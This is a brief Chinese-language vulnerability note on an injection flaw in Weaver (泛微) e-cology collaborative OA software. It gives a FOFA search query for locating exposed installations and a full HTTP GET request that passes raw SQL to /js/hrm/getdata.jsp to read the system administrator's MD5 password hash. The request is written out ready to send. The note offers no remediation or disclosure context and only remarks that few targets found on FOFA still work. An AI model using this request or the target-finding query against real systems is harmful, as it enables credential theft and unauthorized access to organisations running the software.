0x00 漏洞描述

可以通过注入漏洞获取到系统管理员加密的(MD5)的密码值

0x01 fofa语法

app=”泛微-协同办公OA”

0x02 漏洞详情

  1. GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
  2. Host: IP
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
  4. Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  5. Referer: http://IP/login/Login.jsp
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9
  8. Cookie: JSESSIONID=abcKPQwz8VeaP9hDLT5Ix; testBanCookie=test
  9. Connection: close

0x03 总结

fofa上很少能用的